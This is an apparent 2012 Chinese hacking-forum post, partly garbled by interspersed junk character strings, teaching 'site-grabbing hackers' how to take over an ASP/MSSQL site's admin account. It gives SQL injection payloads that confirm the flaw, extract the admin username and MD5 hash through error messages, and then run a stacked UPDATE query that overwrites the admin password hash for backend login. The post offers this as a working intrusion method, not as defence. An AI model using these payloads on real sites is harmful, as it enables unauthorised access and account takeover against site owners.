经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
3 v3 u1 H% d( n2 T% S. _& d- h可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
% O: l0 v9 R$ i5 K( P测试如下:
+ L- B" p- i" ghttp://www.tmdsb.com/news.asp?id=121- r0 m" K/ ^: Y+ o5 Y1 I6 G! c6 U
在地址后输入单引号,显示
: F$ o4 F; |9 f& r. ]8 lMicrosoft OLE DB Provider for SQL Server 错误 ’80040e14’
( E; m) l, f& e S9 m字符串 ’’’ 之前有未闭合的引号( ` l; H" \; I' U
/news/tmdws.asp,行637 r9 R8 u* V, T; C& C
说明没有过滤单引号且数据库是MSSQL.
" I8 D& X! ~* ? Zand 1=1正常。and 1=2出错。肯定存在注入+ L5 N5 ^4 V% u3 H1 I
接着输入% p/ w8 O5 X, B( ~) m8 Q
http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
9 W. Q K% q! A- Q) E- ^得到帐号为:admin
5 {6 f0 j( m7 z1 P) Qhttp://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)0 K, O% e' L" z) Z+ o" ^
得到密码为:a4716077c2ba075c
" D. C V" T9 H0 {% Y9 n3 P6 ~接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f294338 i) z/ @6 ~% E
命令如下 :, C0 c$ O2 _7 R! e! J( e# o
;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
% y& y# z. j0 O- B+ M* N这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41